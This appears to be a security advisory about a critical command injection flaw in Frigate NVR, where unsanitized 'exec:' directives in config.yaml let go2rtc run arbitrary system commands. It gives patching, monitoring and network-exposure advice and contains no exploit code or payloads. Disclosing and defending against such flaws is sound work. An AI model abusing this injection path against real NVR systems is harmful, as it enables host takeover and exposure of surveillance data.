A critical command injection vulnerability in Frigate NVR allows authenticated administrators or unauthenticated remote attackers to execute arbitrary system commands via the go2rtc integration.

This vulnerability is a Remote Command Execution (RCE) flaw residing in the integration between Frigate and go2rtc. The application fails to sanitize user input within the config.yaml file, specifically allowing the exec: directive to facilitate direct system command injection by an authenticated administrator or an unauthenticated attacker if the instance is exposed to the internet.

A successful exploit allows an attacker to gain full control over the underlying host system, leading to total compromise of the NVR surveillance data and potential lateral movement within the network. The CVSS score of 9.1 reflects the critical nature of this flaw, as it grants unauthorized individuals the ability to execute code with the same privileges as the go2rtc service.

Immediate Action: Administrators must immediately update Frigate to version 0.16.4 or later to patch the unsanitized input vulnerability.

Proactive Monitoring: Review the config.yaml file for unauthorized exec: directives and monitor system logs for unusual process spawning from the Frigate or go2rtc services.

Compensating Controls: Ensure the Frigate instance is not exposed to the public internet without a robust authentication layer or VPN, and implement a Web Application Firewall (WAF) to inspect configuration traffic.

Public Exploit Available: false

The severity of this RCE vulnerability cannot be overstated, particularly for organizations relying on Frigate for physical security. It is highly recommended to apply the 0.16.4 patch immediately and audit all configuration files for signs of tampering.